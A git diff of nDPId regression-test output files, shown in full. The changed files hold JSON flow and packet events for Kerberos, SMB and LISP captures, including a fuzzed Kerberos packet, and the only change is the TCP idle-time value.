
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} 
+00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":77,"packets-processed":77,"total-skipped-flows":0,"total-l4-data-len":24133,"total-not-detected-flows":2,"total-guessed-flows":23,"total-detected-flows":11,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":36,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":192,"global_ts_msec":1549337952283} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 77/77 diff --git a/test/results/kerberos_fuzz.pcapng.out b/test/results/kerberos_fuzz.pcapng.out index adf84efef..313d898a7 100644 --- a/test/results/kerberos_fuzz.pcapng.out +++ b/test/results/kerberos_fuzz.pcapng.out 
@@ -1,9 +1,9 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1633884084000} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} 
-00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":288,"pkt_l4_len":268,"thread_ts_msec":1633884084000,"pkt":"RSYBIAFKAAAABn0BfgQBABMAAAAAWNGOAAAAAAAAAQAgAQAAAAAAAGZfRk9VTgAGA0QNChsbGxsbGxsbGxsbJwYGBgYGBgYGBhsbG10bGwYGBgYGBgYGBg0K\/\/\/\/\/05NRWGMG2VyMUnz8\/NDQQEAAAAAAABdKgC3MFD\/AAAAAABfAAAAAAAAAEVhjGlkO\/\/\/\/\/\/\/b2VyWQAAAAAAAABNRQAAAAAAAAAAAAAAAAAAAAAATUxAU0m3MFCjL1MuMlQg80NBTk1FYYxpZDsNCv\/\/\/\/9OTUVhjBtlcjFJ8\/P\/\/\/\/\/AAAAAAAAXSoAtzBQoy9TLkFOTUVhjGlkOw0K\/\/\/\/\/zsNCv\/\/\/\/8vUy4yVEFUIPNDQU5NRWGMaWQ7DQr\/\/\/\/\/"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1i???ca???????]*??0p??????_???????ea?id;?????o","username":"??????"}} 
-00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} +00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":288,"pkt_l4_len":268,"thread_ts_msec":1633884084000,"pkt":"RSYBIAFKAAAABn0BfgQBABMAAAAAWNGOAAAAAAAAAQAgAQAAAAAAAGZfRk9VTgAGA0QNChsbGxsbGxsbGxsbJwYGBgYGBgYGBhsbG10bGwYGBgYGBgYGBg0K\/\/\/\/\/05NRWGMG2VyMUnz8\/NDQQEAAAAAAABdKgC3MFD\/AAAAAABfAAAAAAAAAEVhjGlkO\/\/\/\/\/\/\/b2VyWQAAAAAAAABNRQAAAAAAAAAAAAAAAAAAAAAATUxAU0m3MFCjL1MuMlQg80NBTk1FYYxpZDsNCv\/\/\/\/9OTUVhjBtlcjFJ8\/P\/\/\/\/\/AAAAAAAAXSoAtzBQoy9TLkFOTUVhjGlkOw0K\/\/\/\/\/zsNCv\/\/\/\/8vUy4yVEFUIPNDQU5NRWGMaWQ7DQr\/\/\/\/\/"} 
+00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1i???ca???????]*??0p??????_???????ea?id;?????o","username":"??????"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":260,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1633884084000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 
diff --git a/test/results/lisp_registration.pcap.out b/test/results/lisp_registration.pcap.out
index c3ab7e398..0d4d5c7d0 100644
--- a/test/results/lisp_registration.pcap.out
+++ b/test/results/lisp_registration.pcap.out
@@ -5,25 +5,25 @@ 00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152685554,"flow_last_seen":1597152685554,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1597152685554,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1597152685555,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152685555,"pkt":"qrvMAAEAqrvMAAIACABFwACAAJcAAP8RsBIKAHsCCgB7ARD2EPYAbMDFMgABAT470dH4ChLaAAEAFJgCmsMIGdOV75RgmwLw3u2YWic1AAAFoAGAEAAAAAAC\/AAAAAAAAAAAAAAAAAAAAhYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="} 00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1597152685555,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152685555,"pkt":"qrvMAAEAqrvMAAIACABFwACAAJgAAP8RsBEKAHsCCgB7ARD2EPYAbFMcMgABAecEMPyhgJYjAAEAFLR7gLhELdB05V0IZvC04Du3TwxeAAAFoAEaEAAAAEADAAACIAAKAAAAZAABwKhmABYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152687289,"flow_last_seen":1597152687289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152687289,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1597152687289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687289,"pkt":"qrvMAAEAqrvMAAIACABFwAAs6QkAAP8Gx\/4KAHsCCgB7ATwNEPYND3HOAAAAAGACQACCQgAAAgQFtAAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1597152687290,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687290,"pkt":"qrvMAAIAqrvMAAEACABFwAAszvYAAP8G4hEKAHsBCgB7AhD2PA22haFWDQ9xz2ASQAAqVQAAAgQFtAAA"} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1597152687291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152687291,"pkt":"qrvMAAEAqrvMAAIACABFwAAo6QoAAP8GyAEKAHsCCgB7ATwNEPYND3HPtoWhV1AQQABCEgAAAAAAAAAA"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152687289,"flow_last_seen":1597152687436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152687436,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152687289,"flow_last_seen":1597152687289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152687289,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1597152687289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687289,"pkt":"qrvMAAEAqrvMAAIACABFwAAs6QkAAP8Gx\/4KAHsCCgB7ATwNEPYND3HOAAAAAGACQACCQgAAAgQFtAAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1597152687290,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687290,"pkt":"qrvMAAIAqrvMAAEACABFwAAszvYAAP8G4hEKAHsBCgB7AhD2PA22haFWDQ9xz2ASQAAqVQAAAgQFtAAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1597152687291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152687291,"pkt":"qrvMAAEAqrvMAAIACABFwAAo6QoAAP8GyAEKAHsCCgB7ATwNEPYND3HPtoWhV1AQQABCEgAAAAAAAAAA"} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152687289,"flow_last_seen":1597152687436,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152687436,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":180000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1597152709936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACQAEwAAP8RsEwKAHsDCgB7ARD2EPYAfBP6MgABAnsDNrGOEKjEAAEAFGka+80ImORwcY2JmGWtrFsZgmcCAAAFoAEaEAAAAAABwKhnAP8hISEABQABCgB7AwAABaABIBAAAAAAAQoAAAMhISEhAAUAAQoAewNZ6z+5+pkdP+8AUonJfzt9AAAAAAAAAAA="} 00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":180000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 
00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1597152709936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACoAE0AAP8RsDMKAHsDCgB7ARD2EPYAlFlmMgABAqopDMUFFm31AAEAFBocdBgtY+Hz9Ueh9UZxQJ1vv2IjAAAFoAFAEAAAAAAC\/AABkgFoAQMAAAAAAAAAAP8hISEABQABCgB7AwAABaABgBAAAAAAAvwAAAAAAAAAAAAAAAAAAAMhISEhAAUAAQoAewNZ6z+5+pkdP+8AUonJfzt9AAAAAAAAAAA="} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1597152709936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACAAE4AAP8RsFoKAHsDCgB7ARD2EPYAbDmBMgABAXFyKntOHooaAAEAFI0ikSo37n3NSMdaLlvkb41n5QfMAAAFoAEaEAAAAEADAAACIAAKAAAAZAABwKhnACEhISEABQABCgB7A1nrP7n6mR0\/7wBSicl\/O30AAAAAAAAAAA=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152711673,"flow_last_seen":1597152711673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152711673,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1597152711673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711673,"pkt":"qrvMAAEAqrvMAAMACABFwAAsuMMAAP8G+EMKAHsDCgB7Ac8DEPZkcBpBAAAAAGACQADvdgAAAgQFtAAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1597152711674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711674,"pkt":"qrvMAAMAqrvMAAEACABFwAAsBk8AAP8GqrgKAHsBCgB7AxD2zwMtqeWdZHAaQmASQADcHgAAAgQFtAAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1597152711674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152711674,"pkt":"qrvMAAEAqrvMAAMACABFwAAouMQAAP8G+EYKAHsDCgB7Ac8DEPZkcBpCLanlnlAQQADz2wAAAAAAAAAA"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152711673,"flow_last_seen":1597152711820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152711820,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152711673,"flow_last_seen":1597152712034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 